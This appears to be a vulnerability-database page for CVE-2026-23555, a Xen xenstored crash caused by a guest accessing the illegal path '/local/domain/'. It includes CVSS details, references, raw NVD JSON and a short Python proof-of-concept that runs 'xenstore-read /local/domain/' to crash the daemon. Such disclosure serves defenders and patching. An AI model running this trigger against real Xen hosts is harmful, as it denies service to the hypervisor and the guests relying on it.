CVE-2026-23555

Description

Any guest issuing a Xenstore command accessing a node using the (illegal) node path "/local/domain/", will crash xenstored due to a clobbered error indicator in xenstored when verifying the node path. Note that the crash is forced via a failing assert() statement in xenstored. In case xenstored is being built with NDEBUG #defined, an unprivileged guest trying to access the node path "/local/domain/" will result in it no longer being serviced by xenstored, other guests (including dom0) will still be serviced, but xenstored will use up all cpu time it can get.

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:xen:xen:*:*:*:*:*:*:x86:* - VULNERABLE

Xen (具体受影响版本请参考XSA-481)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2026-23555
# This script attempts to crash xenstored by accessing the illegal path.
import subprocess
import sys

# Simulate sending a xenstore command to the illegal path
# In a real scenario, this would use the xenstore library or direct socket communication
# Command: xenstore-read /local/domain/

def trigger_vulnerability():
    try:
        print("Attempting to access illegal path: /local/domain/")
        # This command attempts to read the restricted path
        result = subprocess.run(['xenstore-read', '/local/domain/'], capture_output=True, text=True)
        print("Command executed. Check xenstored status for crash or high CPU usage.")
        print("Stdout:", result.stdout)
        print("Stderr:", result.stderr)
    except FileNotFoundError:
        print("Error: 'xenstore-read' command not found. This PoC requires Xen tools installed.")
    except Exception as e:
        print(f"An error occurred: {e}")

if __name__ == "__main__":
    trigger_vulnerability()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23555
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23555
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23555/
[4] VulDB https://vuldb.com/cve/CVE-2026-23555
[5] https://xenbits.xenproject.org/xsa/advisory-481.html
[6] http://www.openwall.com/lists/oss-security/2026/03/17/7
[7] http://xenbits.xen.org/xsa/advisory-481.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23555", "sourceIdentifier": "[email protected]", "published": "2026-03-23T07:16:07.330", "lastModified": "2026-04-10T20:38:17.427", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Any guest issuing a Xenstore command accessing a node using the\n(illegal) node path \"/local/domain/\", will crash xenstored due to a\nclobbered error indicator in xenstored when verifying the node path.\n\nNote that the crash is forced via a failing assert() statement in\nxenstored. In case xenstored is being built with NDEBUG #defined,\nan unprivileged guest trying to access the node path \"/local/domain/\"\nwill result in it no longer being serviced by xenstored, other guests\n(including dom0) will still be serviced, but xenstored will use up\nall cpu time it can get."}, {"lang": "es", "value": "Cualquier invitado que emita un comando de Xenstore accediendo a un nodo utilizando la ruta de nodo (ilegal) '/local/domain/', provocará la caída de xenstored debido a un indicador de error sobrescrito en xenstored al verificar la ruta del nodo.\n\nTenga en cuenta que la caída es forzada mediante una instrucción assert() fallida en xenstored. En caso de que xenstored se compile con NDEBUG #definido, un invitado sin privilegios que intente acceder a la ruta del nodo '/local/domain/' resultará en que ya no sea atendido por xenstored, otros invitados (incluido dom0) seguirán siendo atendidos, pero xenstored consumirá todo el tiempo de CPU que pueda obtener."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 4.0}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-617"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:xen:xen:*:*:*:*:*:*:x86:*", "versionStartIncluding": "4.18.0", "matchCriteriaId": "242BBD5A-0BAE-4F89-8597-7D286D6C9E25"}]}]}], "references": [{"url": "https://xenbits.xenproject.org/xsa/advisory-481.html", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/17/7", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}, {"url": "http://xenbits.xen.org/xsa/advisory-481.html", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Patch", "Vendor Advisory"]}]}}